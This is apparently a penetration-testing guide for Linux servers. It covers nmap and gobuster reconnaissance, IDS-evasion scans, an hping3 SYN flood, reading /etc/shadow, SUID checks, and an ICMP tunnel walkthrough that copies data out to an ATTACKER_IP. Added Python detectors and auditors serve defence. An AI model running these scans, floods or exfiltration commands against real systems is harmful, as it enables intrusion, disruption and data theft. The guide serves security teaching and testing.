
Pentesting a Linux Server

The first, most logical thing to find out is for what purpose the server is being used. This, along with other basic information, guides the rest of the test.

1. Recon

dig example.com
whois example.com

OSINT

git clone https://github.com/laramies/theHarvester.git

2. Scanning & Enum

If scanning a whole network, find out who is up first:

nmap -sn 192.168.1.0/24 -oG - | awk '/Up$/{print $2}' > active_hosts.txt
Then scan only those hosts to learn which services are running and which common ports are open.
nmap -sV -iL active_hosts.txt
Further or more targeted scanning may also call for running the default scripts (-sC); if the host is a web server, also run the http-enum script.
nmap -sC --script http-enum 192.168.1.10

A Note on Noise

The method above has a goal of being moderately discreet by first doing a ping sweep and then doing more targeted discovery. If being detected is not of concern, a TCP connect scan could produce more detailed results.

The Noisy Way

nmap -sT -vv -oA network-topology <ip.addr/24>
Grab our list of open IPs:
grep open network-topology.gnmap | cut -d" " -f 2 > device_list.txt
Rescan the network aggressively for additional IPs, excluding the hosts already on the open IP list:
nmap -A --excludefile device_list.txt 192.168.1.0/24
Add any additional IPs found to the list:
echo "192.168.1.48" >> device_list.txt
Now rerun scan of the found IPs aggressively, but remove the ping as we no longer need to discover hosts:
nmap -Pn -A -iL device_list.txt
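
Both the ping sweep above and the noisy walkthrough lean on nmap's greppable output (-oG, or the .gnmap file written by -oA) and pull hosts out of it with grep and cut. The following is an added example, not part of this page or of nmap: it parses that format properly (tab-separated fields, each Ports entry as port/state/protocol/owner/service/rpc-info/version/) into a host and open-port inventory and then compares the inventory with an allow-list of what each host is supposed to expose, which is the same data a defender wants when reviewing a scan of their own network. SAMPLE_GNMAP and EXPECTED are constructed for the example.

```python
"""Turn nmap greppable output (-oG / the .gnmap file from -oA) into a host and service
inventory that can be checked against what is supposed to be running.

Added example for this page, not nmap's own tooling. SAMPLE_GNMAP and EXPECTED are constructed."""
from collections import defaultdict

# Constructed sample in greppable format; fields on a Host: line are tab-separated and
# each Ports: entry is port/state/protocol/owner/service/rpc-info/version/
SAMPLE_GNMAP = """\
# Nmap 7.94 scan initiated Mon Jan  1 00:00:00 2024 as: nmap -sV -oG - 192.168.1.0/24
Host: 192.168.1.10 ()\tStatus: Up
Host: 192.168.1.10 ()\tPorts: 22/open/tcp//ssh//OpenSSH 8.9p1 Ubuntu/, 80/open/tcp//http//Apache httpd 2.4.52/, 443/closed/tcp//https///\tIgnored State: filtered (997)
Host: 192.168.1.11 ()\tStatus: Up
Host: 192.168.1.11 ()\tPorts: 21/open/tcp//ftp//vsftpd 3.0.3/\tIgnored State: closed (999)
Host: 192.168.1.12 ()\tStatus: Down
# Nmap done at Mon Jan  1 00:01:00 2024 -- 256 IP addresses (2 hosts up) scanned in 60.00 seconds
"""

# Services the operator expects each host to expose; anything else deserves a closer look.
# Constructed allow-list for the example.
EXPECTED = {"192.168.1.10": {22, 80}, "192.168.1.11": set()}


def parse_gnmap(text):
    """Return {ip: {"up": bool, "ports": [(port, proto, service, version), ...]}} for open ports."""
    hosts = defaultdict(lambda: {"up": False, "ports": []})
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue  # comment header and trailer lines
        fields = line.split("\t")
        ip = fields[0].split()[1]
        for field in fields[1:]:
            if field.startswith("Status:"):
                hosts[ip]["up"] = field.split(":", 1)[1].strip() == "Up"
            elif field.startswith("Ports:"):
                hosts[ip]["up"] = True  # nmap only emits a port list for live hosts
                for entry in field[len("Ports:"):].split(","):
                    parts = entry.strip().split("/")
                    if len(parts) < 7:
                        continue  # malformed entry, skip rather than crash
                    port, state, proto, _owner, service, _rpc, version = parts[:7]
                    if state == "open":
                        hosts[ip]["ports"].append((int(port), proto, service, version))
    return dict(hosts)


def live_hosts(inventory):
    """IPs that answered, equivalent to the awk '/Up$/' filter used above."""
    return sorted(ip for ip, h in inventory.items() if h["up"])


def unexpected_services(inventory, expected):
    """Open ports not on the allow-list, plus live hosts the allow-list does not know about."""
    findings = {}
    for ip, h in inventory.items():
        if not h["up"]:
            continue
        allowed = expected.get(ip)
        extra = [p for p in h["ports"] if allowed is None or p[0] not in allowed]
        if allowed is None or extra:
            findings[ip] = extra
    return findings


if __name__ == "__main__":
    inv = parse_gnmap(SAMPLE_GNMAP)
    print("live:", live_hosts(inv))
    for ip, extra in unexpected_services(inv, EXPECTED).items():
        print(f"{ip}: unexpected {extra}")
```

Feeding a real .gnmap file in place of SAMPLE_GNMAP and a maintained allow-list in place of EXPECTED gives a repeatable "what changed since last scan" check; the grep/cut pipeline above answers only "which hosts", this also answers "which services, and should they be there".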

The Quiet Way

If being more stealthy is necessary, here are some other options to consider:

Stealth Scan

Note: May be detected by intrusion detection systems (IDS)

nmap -sS -T4 192.168.0.1-254

FIN Scan
nmap -sF 192.168.0.1-254
Save Noted IPs to a File
nano scan_targets.txt
UDP Scan
nmap -sU -iL scan_targets.txt -oA target_data.txt

Avoid IDS with XMAS Scan (IDS tend to detect Stealth Scans)

nmap -sX -iL scan_targets.txt -oA XMAS_data.txt

Based on the services/versions running

searchsploit serviceName versionNumber
searchsploit -w Apache

Gobuster

Find Web Pages

gobuster dir -u http://example.com -w /usr/share/wordlists/dirb/common.txt 

-u : The URL to scan.
-w : Path to the wordlist to use for brute forcing.

Find Subdomains

gobuster dns -d example.com -w /usr/share/wordlists/subdomains-top1million-110000.txt -r 8.8.8.8

-d : The target domain for which you want to find subdomains.
-w : Path to the wordlist you will use for subdomain brute-forcing.
-r : Specifies the DNS resolver to use.
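
A gobuster dir run like the one above leaves a very recognisable trace on the target: one client producing a long run of 404s in a few seconds. The following is an added example, not part of this page or of gobuster, showing how a defender would pick that pattern out of a combined-format access log with a sliding window per client IP. The log lines are constructed, and the window and threshold values are assumptions to tune against real traffic.

```python
"""Spot wordlist-driven path discovery (gobuster dir and similar) in a web server's access log.

Added example for this page, not gobuster's or any web server's own code. The log lines are
constructed, and the window/threshold values are assumptions to tune against your own traffic."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

# Apache/nginx "combined" format: ip ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

_BASE = datetime(2024, 1, 1, 12, 0, 0, tzinfo=timezone.utc)


def _line(ip, offset_s, path, status):
    """Build one constructed combined-format log line offset_s seconds after _BASE."""
    ts = (_BASE + timedelta(seconds=offset_s)).strftime(TS_FMT)
    return f'{ip} - - [{ts}] "GET {path} HTTP/1.1" {status} 153 "-" "Mozilla/5.0"'


# Constructed sample: one client walks a wordlist in twelve seconds, another browses normally.
SAMPLE_LOG = [
    _line("203.0.113.5", i, p, 404)
    for i, p in enumerate(["/admin", "/backup", "/config", "/.git", "/old", "/test",
                           "/uploads", "/db", "/login", "/phpmyadmin", "/wp-admin", "/cgi-bin"])
] + [
    _line("198.51.100.7", 5, "/", 200),
    _line("198.51.100.7", 30, "/favicon.ico", 404),
    _line("198.51.100.7", 31, "/about", 200),
]


def parse_line(line):
    """Parse one combined-format line; returns None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {"ip": m["ip"], "ts": datetime.strptime(m["ts"], TS_FMT),
            "path": m["path"], "status": int(m["status"])}


def find_path_bruteforce(lines, window_s=60, threshold=10):
    """Return {ip: peak 404 count} for clients with >= threshold 404s inside any window_s span.

    Lines are expected in time order per client, as a live log is."""
    recent = defaultdict(deque)   # ip -> timestamps of that client's recent 404s
    flagged = {}
    for rec in map(parse_line, lines):
        if rec is None or rec["status"] != 404:
            continue
        q = recent[rec["ip"]]
        q.append(rec["ts"])
        while (rec["ts"] - q[0]) > timedelta(seconds=window_s):
            q.popleft()               # drop 404s that fell out of the window
        if len(q) >= threshold:
            flagged[rec["ip"]] = max(flagged.get(rec["ip"], 0), len(q))
    return flagged


if __name__ == "__main__":
    for ip, n in find_path_bruteforce(SAMPLE_LOG).items():
        print(f"{ip}: {n} 404s within 60s, likely directory brute force")
```

The normal client's single 404 (a missing favicon) never reaches the threshold, while the wordlist client is flagged as soon as its tenth miss lands inside the window. The same structure works for the DNS mode above if the input is resolver query logs and the key is NXDOMAIN responses instead of HTTP 404s.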

Test Firewall

Simulate a SYN Flood Attack to stress test the network or firewall.

hping3 -S -V --flood 192.168.1.10
Evading firewall rules is possible if you specify your ports. Here's an example:
hping3 --traceroute -V -p 80 -S -A --baseport 1337 thecurious.cloud

Fork in the Road

Where you go next depends heavily on what you've found so far.

A. Web Server

Visit the website through curl or browser.

curl http://example.com
Test any input fields for command injection after first seeing how they handle correct input.

B. SQL Server
C. FTP Server
D. Print Server

3. Initial Access

4. Persistence

Get the Lay of the Land

What's running?

ps aux

Who's logged in?

w

Who was logged in?

last

What's happening on the network?

netstat -pantu

or the newer, more detailed:

ss -tulpn

OS Info

cat /etc/os-release

System Architecture Info

uname -a
cat /etc/passwd
cat /etc/shadow

Check if Python is Installed

ls /bin /usr/bin | grep -i python

Download and Run LinEnum

./LinEnum.sh

5. Privilege Escalation

Checking SUID/SGID files

SUID (set-user-ID) files:

find / -perm -4000 -type f 2>/dev/null

SGID (set-group-ID) files:

find / -perm -2000 -type f 2>/dev/null

Iterate through each of the results to determine if any permissions need to be changed.

Checking for writeable directories

find / -type d -writable 2>/dev/null

Find writable directories in the PATH

echo $PATH | tr ':' '\n' | while read p; do find "$p" -writable -type d 2>/dev/null; done
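
The find commands above are one-off checks; what a defender actually wants is a baseline of set-id files to diff against, so that a new setuid binary or a freshly writable PATH directory stands out. The following is an added example, not part of this page, of LinEnum or of any other tool: it walks the filesystem for setuid/setgid regular files (skipping /proc, /sys, /dev and /run), reports what changed against a recorded baseline, and reproduces the writable-PATH loop in Python. BASELINE is a constructed stand-in for a list saved from a known-good state.

```python
"""Audit set-uid/set-gid binaries against a baseline and list writable directories on PATH.

Added example for this page, not part of LinEnum or any other tool. Record a baseline from a
known-good state, then re-run after changes or an incident and diff. BASELINE below is a
constructed stand-in for a previously saved list."""
import os
import stat

PRUNE = ("/proc", "/sys", "/dev", "/run")   # pseudo and volatile filesystems, skip them


def find_setid_files(root="/"):
    """Return sorted paths of regular files under root with the setuid or setgid bit set."""
    found = []
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda e: None):
        if any(dirpath == p or dirpath.startswith(p + "/") for p in PRUNE):
            dirnames[:] = []          # do not descend into pruned trees
            continue
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)   # lstat: do not follow symlinks
            except OSError:
                continue              # unreadable entry, same as 2>/dev/null above
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                found.append(path)
    return sorted(found)


def diff_against_baseline(current, baseline):
    """Set-id files that appeared since the baseline (suspicious) and ones that vanished."""
    cur, base = set(current), set(baseline)
    return {"unexpected": sorted(cur - base), "missing": sorted(base - cur)}


def writable_path_dirs(path_env):
    """Directories on a PATH string that the current user can write to.

    A writable PATH directory lets an unprivileged user place a program where a privileged
    process may pick it up by name, so each hit should be justified or have its mode tightened."""
    hits = []
    for d in path_env.split(":"):
        if d and os.path.isdir(d) and os.access(d, os.W_OK):
            hits.append(d)
    return hits


# Constructed baseline; a real one would be the saved output of find_setid_files().
BASELINE = ["/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/su"]

if __name__ == "__main__":
    current = find_setid_files("/")
    delta = diff_against_baseline(current, BASELINE)
    print("new set-id files:", delta["unexpected"])
    print("missing from baseline:", delta["missing"])
    print("writable PATH dirs:", writable_path_dirs(os.environ.get("PATH", "")))
```

Run as root the walk covers everything; as an ordinary user it silently skips what it cannot read, which mirrors the 2>/dev/null in the commands above. Note that os.access() answers for the user running the script, so run it as the account whose exposure you are assessing, not as root.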

Adjust Permissions

Adjust the permissions so that users and services have only the necessary rights to perform their duties. Use usermod and groupmod for this. In Windows, you can manage user permissions through the Local Users and Groups Manager or PowerShell.

Add User to a Group

sudo usermod -aG groupName username

6. Exfil

Sometimes attackers will evade firewall rules by exfiltrating data over ICMP when traditional TCP/UDP traffic is blocked.

Scenario

  • TARGET_IP is running an SSH service and holds the data the attacker wants.
  • ATTACKER_IP will be used to initiate the tunnel and attempt a connection to TARGET_IP.
  • PROXY_IP will be the ICMP proxy server through which the ICMP packets will be relayed between the TARGET_IP and the ATTACKER_IP.

From PROXY_IP Box Setup

Set up NAT so that the traffic appears to come from the PROXY_IP and not the ATTACKER_IP
(This assumes the shared network interface for the PROXY_IP and the TARGET_IP is eth0.)

# Enable IP forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward

# Set up IP masquerading
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
Initiate the tunnel service
ptunnel

From ATTACKER_IP Box Setup

ptunnel -p PROXY_IP -lp 8000 -da TARGET_IP -dp 22
-p = the ptunnel proxy host (PROXY_IP in this scenario), -lp = local port, -da = destination address, -dp = destination port

From ATTACKER_IP connect to SSH via the tunnel

ssh -p 8000 TARGET_USERNAME@localhost
or
scp -P 8000 TARGET_USERNAME@localhost:~/data.txt .
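
From the defender's side, the tunnel described above does not look like ping: echo requests arrive in bursts, with payloads far larger than the 56 bytes iputils ping sends, of varying size, and with content that changes from packet to packet instead of the fixed fill pattern. The following is an added example, not part of this page, of ptunnel, or of any IDS: it scores echo-request flows on those four heuristics from per-packet metadata (time, source, destination, payload). The packet records are constructed, and every threshold is an assumption to tune against the baseline of your own network.

```python
"""Heuristics for spotting ICMP tunnelling (ptunnel-style SSH-over-echo) in echo-request metadata.

Added example for this page, not ptunnel's code and not a copy of any IDS rule. The packet
records are constructed, and every threshold is an assumption to tune against your own baseline."""
import random
from collections import Counter, defaultdict

ICMP_ECHO_REQUEST = 8
MAX_NORMAL_PAYLOAD = 128   # iputils ping sends 56 bytes by default, Windows ping 32
MAX_DISTINCT_SIZES = 2     # ordinary ping keeps one size for the whole run
MAX_PKTS_PER_SEC = 5.0     # interactive tunnels burst well above one echo per second


def build_samples():
    """Constructed packets as (time, src, dst, icmp_type, payload); not captured traffic."""
    pkts = []
    pattern = bytes(range(0x10, 0x40))      # iputils ping: 8-byte timestamp, then this fixed fill
    for i in range(5):                       # a normal 5-packet ping, one per second
        ts_field = (1700000000 + i).to_bytes(8, "big")
        pkts.append((1700000000.0 + i, "192.168.1.20", "192.168.1.1",
                     ICMP_ECHO_REQUEST, ts_field + pattern))
    rng = random.Random(1)                   # deterministic stand-in for encrypted tunnel data
    for i in range(40):                      # tunnel-like burst: 40 echoes in 4 s, big varying payloads
        size = rng.randint(200, 1400)
        payload = bytes(rng.getrandbits(8) for _ in range(size))
        pkts.append((1700000100.0 + i * 0.1, "192.168.1.30", "198.51.100.9",
                     ICMP_ECHO_REQUEST, payload))
    return pkts


def group_flows(packets):
    """Group echo requests by (src, dst); replies are ignored here for brevity."""
    flows = defaultdict(list)
    for ts, src, dst, icmp_type, payload in packets:
        if icmp_type == ICMP_ECHO_REQUEST:
            flows[(src, dst)].append((ts, payload))
    return flows


def score_flow(entries):
    """Return the heuristics a flow trips; an empty list means it looks like plain ping."""
    reasons = []
    sizes = [len(p) for _, p in entries]
    if max(sizes) > MAX_NORMAL_PAYLOAD:
        reasons.append("large_payload")
    if len(set(sizes)) > MAX_DISTINCT_SIZES:
        reasons.append("variable_size")
    times = sorted(t for t, _ in entries)
    span = max(times[-1] - times[0], 1e-3)
    if len(entries) > 1 and len(entries) / span > MAX_PKTS_PER_SEC:
        reasons.append("high_rate")
    # after the 8-byte timestamp a normal ping payload never changes; tunnelled data always does
    tails = Counter(p[8:] for _, p in entries)
    if len(entries) >= 3 and tails.most_common(1)[0][1] < len(entries) / 2:
        reasons.append("changing_pattern")
    return reasons


def detect_icmp_tunnels(packets):
    """Map each suspicious (src, dst) flow to the heuristics it tripped."""
    findings = {}
    for flow, entries in group_flows(packets).items():
        reasons = score_flow(entries)
        if reasons:
            findings[flow] = reasons
    return findings


if __name__ == "__main__":
    for (src, dst), reasons in detect_icmp_tunnels(build_samples()).items():
        print(f"{src} -> {dst}: {', '.join(reasons)}")
```

In practice the records would come from a capture or from flow logs that retain ICMP payload size, and a single tripped heuristic is a hint while three or four together are a strong signal. The cheaper mitigation the scenario itself points at is to not let ICMP echo pass the firewall unrestricted in the first place, or at least to rate-limit it per host.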

7. Analysis & Reporting

8. Remediation and Re-testing